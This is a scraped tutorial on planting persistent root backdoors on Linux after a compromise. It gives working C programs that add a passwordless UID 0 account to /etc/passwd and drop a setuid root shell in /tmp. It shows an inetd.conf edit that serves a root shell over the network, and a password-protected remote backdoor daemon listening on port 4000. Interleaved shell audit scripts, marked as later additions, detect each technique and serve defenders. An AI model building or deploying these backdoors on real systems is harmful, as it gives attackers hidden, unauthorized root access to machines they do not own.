Summary of creating a Linux backdoor

Source: Internet
Author: User

Elementary
The simplest method is to add an account with a UID of 0 to the password file /etc/passwd. But it is best not to do this, because as soon as the system administrator checks the password file it will be discovered. The following is a C program that appends a UID 0 account to the /etc/passwd file.
<++> Backdoor/backdoor1.c
#include <stdio.h>

/* Appends a UID 0, GID 0 account named hax0r with an empty password field
   to /etc/passwd. Field order: name:password:UID:GID:GECOS:home:shell. */
int main(void)
{
    FILE *fd;
    fd = fopen("/etc/passwd", "a+");
    if (fd == NULL)
        return 1;               /* not root, or the file is locked down */
    fprintf(fd, "hax0r::0:0::/root:/bin/sh\n");
    fclose(fd);
    return 0;
}
<-->

A slightly more concealed variant is to take an unused account that already exists in the password file, change its UID to 0 and set its second field (the password field) to empty. (Note: on newer *nix systems that use shadow passwords, the corresponding entry in /etc/shadow must be modified as well.)
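The administrator's side of both passwd tricks, as an added example that is not part of the original article: a POSIX sh/awk audit that lists UID 0 accounts and empty password fields in passwd-format and shadow-format files. It assumes only sh, awk and mktemp; the sample files it scans are constructed for the example and are not from a real system.

```shell
#!/bin/sh
# Added audit example (not from the original article): find the two
# /etc/passwd backdoors described above. Each function takes a file in
# passwd or shadow format, so it can be run against copies or live files.

# Every account whose UID field (column 3) is 0. Any name other than root
# here is a root alias.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Accounts whose password field (column 2) is empty, meaning no password is
# required at login. Column 2 is the password field in both /etc/passwd
# and /etc/shadow, so the same test works on either file.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Verdict for a passwd/shadow pair: "clean" if root is the only UID 0
# account and no password field is empty, otherwise "suspicious".
audit_passwd() {
    extra=$(awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1")
    nopass=$(empty_password_accounts "$1"; empty_password_accounts "$2")
    if [ -z "$extra" ] && [ -z "$nopass" ]; then
        echo clean
    else
        echo suspicious
    fi
}

# Constructed sample files (not a real system) showing both techniques:
# "hax0r" was appended with UID 0 and an empty password field, exactly as
# backdoor1.c does; "games", an unused account, had its UID changed to 0
# and its shadow hash blanked.
tmp=$(mktemp -d); trap 'rm -rf "$tmp"' EXIT
cat > "$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
games:x:0:60:games:/usr/games:/usr/sbin/nologin
hax0r::0:0::/root:/bin/sh
EOF
cat > "$tmp/shadow" <<'EOF'
root:$6$saltsalt$notarealhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
games::19000:0:99999:7:::
EOF

echo "UID 0 accounts:";        uid0_accounts "$tmp/passwd"
echo "Empty password fields:"; empty_password_accounts "$tmp/passwd"
                               empty_password_accounts "$tmp/shadow"
echo "Verdict: $(audit_passwd "$tmp/passwd" "$tmp/shadow")"
```

Run it against the live files with `audit_passwd /etc/passwd /etc/shadow` (reading /etc/shadow needs root). The UID check deliberately looks at column 3 rather than the account name, because the second trick leaves a perfectly ordinary-looking name in place.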

Place a suid shell in the /tmp directory. From then on, simply running that program gives you root privileges. This method is probably the most popular. However, many systems clear the /tmp directory every few hours or at every boot, and other systems mount /tmp so that suid programs there are not honoured (the nosuid mount option). Of course, you can modify or remove these limits yourself, since you are already root and can edit /var/spool/cron/crontabs/root and /etc/fstab. The following C program places a suid shell in /tmp.

<++> Backdoor/backdoor2.c
#include <stdlib.h>

/* Copies /bin/sh to /tmp/fid, makes it root-owned and sets the setuid bit
   (mode 4755). Must be run as root. Note that bash drops the effective
   UID at startup unless invoked with -p, so copy a shell that does not. */
int main(void)
{
    system("cp /bin/sh /tmp/fid");
    system("chown root.root /tmp/fid");
    system("chmod 4755 /tmp/fid");
    return 0;
}
<-->
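The two checks that catch the /tmp suid shell, as an added example that is not part of the original article: a POSIX sh function that lists setuid files under a directory, and one that reads an fstab-format file and reports scratch mount points lacking the nosuid option the text mentions. The directory tree and fstab it scans are constructed for the example; the setuid file is an empty stand-in for the copied shell.

```shell
#!/bin/sh
# Added audit example (not from the original article): the checks an
# administrator runs against the /tmp suid-shell trick. Needs only sh,
# find and awk.

# Setuid files (mode bit 04000) under the given directory, one per line.
# -xdev keeps find on one filesystem so a large /tmp scan stays cheap.
setuid_files() {
    find "$1" -xdev -type f -perm -4000 -print | sort
}

# Mount points from an fstab-format file that hold scratch files but are
# mounted without nosuid (with nosuid the kernel ignores the setuid bit on
# that filesystem). Columns: device, mount point, fs type, options.
scratch_mounts_without_nosuid() {
    awk '/^[ \t]*#/ || NF < 4 { next }
         $2 ~ "^/(tmp|var/tmp)$" && ("," $4 ",") !~ /,nosuid,/ { print $2 }' "$1"
}

# Constructed sample tree and fstab (not a real system): "fid" carries the
# 4755 mode that backdoor2.c sets, next to a harmless file; /tmp is mounted
# without nosuid while /var/tmp has it.
tmp=$(mktemp -d); trap 'rm -rf "$tmp"' EXIT
mkdir "$tmp/fake_tmp"
: > "$tmp/fake_tmp/fid"             # empty stand-in for the copied shell
chmod 4755 "$tmp/fake_tmp/fid"      # owner may set the setuid bit on own file
: > "$tmp/fake_tmp/notes.txt"
cat > "$tmp/fstab" <<'EOF'
# <file system> <mount point> <type> <options>          <dump> <pass>
/dev/sda1       /             ext4   errors=remount-ro   0      1
/dev/sda2       /tmp          ext4   defaults            0      2
tmpfs           /var/tmp      tmpfs  nosuid,nodev        0      0
EOF

echo "setuid files:";                  setuid_files "$tmp/fake_tmp"
echo "scratch mounts missing nosuid:"; scratch_mounts_without_nosuid "$tmp/fstab"
```

On a real host run `setuid_files /tmp` and `scratch_mounts_without_nosuid /etc/fstab`; a root-owned setuid file in /tmp has no legitimate reason to exist, and the fstab check tells you whether the system would even honour it.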
____________________________________________________________________
Intermediate

The configuration file of the super-server daemon inetd is another good place for a backdoor, since administrators generally do not check it often. What is the best backdoor to build here? A remote one, of course: that way you do not need a local account in order to become root. First, some background: the inetd process listens for connection requests on various TCP and UDP ports and starts the corresponding server process when a request arrives. The configuration file /etc/inetd.conf is very simple. Its basic form is as follows:

(1)       (2)     (3)      (4)     (5)   (6)              (7)
ftp       stream  tcp      nowait  root  /usr/etc/ftpd    ftpd
talk      dgram   udp      wait    root  /usr/etc/ntalkd  ntalkd
mountd/1  stream  rpc/tcp  wait    root  /usr/etc/mountd  mountd

1: The first column is the service name. The name is mapped to a port number by looking it up in /etc/services (for TCP and UDP services) or via the portmap daemon (for RPC services). RPC (Remote Procedure Call) services are identified by a name of the form name/num and by the rpc flag in the third column.
2: The second column gives the type of socket the service uses: stream, dgram or raw. Generally stream is used for TCP services and dgram for UDP; raw is rarely used.
3: The third column names the communication protocol the service uses. The allowed values are listed in the /etc/protocols file; in practice it is almost always tcp or udp. For RPC services the protocol is prefixed with rpc/.
4: If the server can handle several requests in one invocation (rather than exiting after each one), the fourth column should be wait, which stops inetd from continually forking new copies of the daemon. This is used for services that process many small requests. Otherwise put nowait in this field.
5: The fifth column is the user name the daemon runs as.
6: The sixth column is the fully qualified path of the daemon.
7: The seventh column is the name the daemon is started with (its argv[0]) followed by its arguments.

If the work to be done is trivial (for example, no user interaction is needed), inetd handles it itself; in that case columns 6 and 7 simply contain the word internal. To install a convenient backdoor, therefore, pick a service that is rarely used and replace its daemon with a program that creates the backdoor, for example one that adds a UID 0 account or copies a suid shell.

One of the nicer options is to replace the daytime service (which merely returns the date and time) with a shell running as root, which gives an interactive root shell over the network. In /etc/inetd.conf, change:

daytime stream tcp nowait root internal

To:

daytime stream tcp nowait root /bin/sh sh -i

Then make inetd reread its configuration:

killall -HUP inetd

(SIGKILL, as in killall -9 inetd, would terminate inetd instead of reloading it, and you would have to start it again by hand.)
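An audit of inetd.conf that uses the seven-column layout described above and catches the daytime trick, as an added example that is not part of the original article. It assumes POSIX sh and awk; the inetd.conf it parses is constructed for the example and mixes the page's own entries with the backdoor line. It also flags two related patterns the text does not show: a trivial service that is no longer marked internal, and a root service started from a world-writable directory.

```shell
#!/bin/sh
# Added audit example (not from the original article): parse inetd.conf
# and flag entries that look like the daytime backdoor.
#
# Columns: 1 service  2 socket type  3 protocol  4 wait/nowait
#          5 user     6 server path  7 argv[0] and arguments
suspicious_inetd_entries() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }            # skip comments and blanks
        {
            reason = ""
            if ($6 ~ "/(sh|bash|dash|ksh|csh|tcsh)$")
                reason = "server program is a shell"
            else if ($1 ~ "^(echo|discard|daytime|chargen|time)$" && $6 != "internal")
                reason = "trivial service handled by an external program"
            else if ($5 == "root" && $6 ~ "^/(tmp|var/tmp|dev/shm)/")
                reason = "root service started from a world-writable directory"
            if (reason != "")
                printf "%s: %s (line %d: %s)\n", $1, reason, NR, $0
        }' "$1"
}

# Number of flagged entries; a cron job can mail when this is non-zero.
count_suspicious_inetd_entries() {
    suspicious_inetd_entries "$1" | wc -l | tr -d ' '
}

# Constructed sample inetd.conf (not copied from a real host): the three
# entries from the article, an internal service, a commented-out line,
# the daytime backdoor line and a root server parked in /tmp.
tmp=$(mktemp -d); trap 'rm -rf "$tmp"' EXIT
cat > "$tmp/inetd.conf" <<'EOF'
# inetd.conf sample
ftp      stream  tcp      nowait  root  /usr/etc/ftpd    ftpd
talk     dgram   udp      wait    root  /usr/etc/ntalkd  ntalkd
mountd/1 stream  rpc/tcp  wait    root  /usr/etc/mountd  mountd
echo     stream  tcp      nowait  root  internal
#daytime stream  tcp      nowait  root  internal
daytime  stream  tcp      nowait  root  /bin/sh          sh -i
nntp     stream  tcp      nowait  root  /tmp/.x/nntpd    nntpd
EOF

suspicious_inetd_entries "$tmp/inetd.conf"
echo "flagged: $(count_suspicious_inetd_entries "$tmp/inetd.conf")"
```

Against a live host run `suspicious_inetd_entries /etc/inetd.conf`; since `killall -HUP inetd` is all it takes to activate an edited line, comparing the file against a known-good copy (or a checksum taken at install time) is the complementary check.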

A better and more concealed method still is to forge a network service that provides the backdoor and protects it with a password, which makes it even less noticeable. It is better yet if it does not depend on inetd at all, so that remote access stays easy whatever happens to inetd: bind your "own" daemon to a port. The program gives no prompt to whoever connects, but as soon as the correct password is entered you are in. Below is a demonstration program for this kind of backdoor. (Note: the program is not complete.)

<++> Backdoor/remoteback.c
/* Coders:
        Theft

   Help from:
        Sector9, Halogen

   Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen,
           Psionic, mongod, Psionic.
           Groups: Ethical Mutiny Crew (EMC), Common Purpose hackers (CPH),
           Global Hell (gH), Team Sploit, Hong Kong Danger Duo,
           Tg0d, EHAP.
   Usage:
     Setup:
        # gcc -o backhore backhore.c
        # ./backhore password &
     Run:
        Telnet to the host on port 4000. After connecting you
        will not be prompted for a password, this way it is less
        obvious, just type the password and press enter, after this
        you will be prompted for a command, pick 1-8.

   Distributers:
        Ethical Mutiny Crew

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr

void handle(int);

int
main(int argc, char *argv[])
{
    int sockfd, new_fd, numbytes, cmd;
    socklen_t sin_size;
    char ask[10] = "Command: ";
    char buf[MAXDATASIZE], pass[40];
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;

    printf("\nBackhore BETA by Theft\n");
    printf("1: trojans rc.local\n");
    printf("2: sends a systemwide message\n");
    printf("3: binds a root shell on port 2000\n");
    printf("4: creates suid sh in /tmp\n");
    printf("5: creates mutiny account uid 0 no passwd\n");
    printf("6: drops to suid shell\n");
    printf("7: information on backhore\n");
    printf("8: contact\n");

    if (argc != 2) {
        fprintf(stderr, "Usage: %s password\n", argv[0]);
        exit(1);
    }

    strncpy(pass, argv[1], sizeof(pass) - 1);
    pass[sizeof(pass) - 1] = '\0';
    printf("..using password: %s..\n", pass);
    fflush(stdout);                     /* do not duplicate the buffer into children */

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }

    memset(&my_addr, 0, sizeof(my_addr));
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(PORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sockfd, (SA *)&my_addr, sizeof(my_addr)) == -1) {
        perror("bind");
        exit(1);
    }

    /* The article's listing stops at the bind() check ("this program is
       not complete"). What follows is a minimal completion of the accept
       loop and the silent password check described in the Usage comment. */
    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen");
        exit(1);
    }
    signal(SIGCHLD, SIG_IGN);           /* forked children are reaped automatically */

    for (;;) {
        sin_size = sizeof(their_addr);
        if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
            perror("accept");
            continue;
        }
        if (fork() == 0) {              /* child: serve this one client */
            close(sockfd);
            /* No banner and no prompt: wait for a line and compare it. */
            numbytes = recv(new_fd, buf, MAXDATASIZE - 1, 0);
            if (numbytes <= 0)
                exit(0);
            buf[numbytes] = '\0';
            buf[strcspn(buf, "\r\n")] = '\0';
            if (strcmp(buf, pass) != 0)
                exit(0);                /* wrong password: drop silently */

            send(new_fd, ask, strlen(ask), 0);
            numbytes = recv(new_fd, buf, MAXDATASIZE - 1, 0);
            if (numbytes <= 0)
                exit(0);
            buf[numbytes] = '\0';
            cmd = atoi(buf);

            /* Point stdin/stdout/stderr at the client so handle() talks to it. */
            dup2(new_fd, 0);
            dup2(new_fd, 1);
            dup2(new_fd, 2);
            handle(cmd);
            exit(0);
        }
        close(new_fd);                  /* parent: back to accept() */
    }
}

/* Run the chosen menu item. Items 4 and 5 are the two "Elementary"
   backdoors from this article (suid shell in /tmp, UID 0 account with an
   empty password field); the other items are not part of the published
   listing and are only acknowledged here. */
void
handle(int cmd)
{
    FILE *fd;

    switch (cmd) {
    case 4:
        system("cp /bin/sh /tmp/sh; chown root.root /tmp/sh; chmod 4755 /tmp/sh");
        printf("suid sh created in /tmp\n");
        break;
    case 5:
        if ((fd = fopen("/etc/passwd", "a+")) != NULL) {
            fprintf(fd, "mutiny::0:0::/root:/bin/sh\n");
            fclose(fd);
        }
        printf("account mutiny (uid 0, no password) created\n");
        break;
    case 1: case 2: case 3: case 6: case 7: case 8:
        printf("item %d is not implemented in this listing\n", cmd);
        break;
    default:
        printf("unknown command\n");
        break;
    }
}
<-->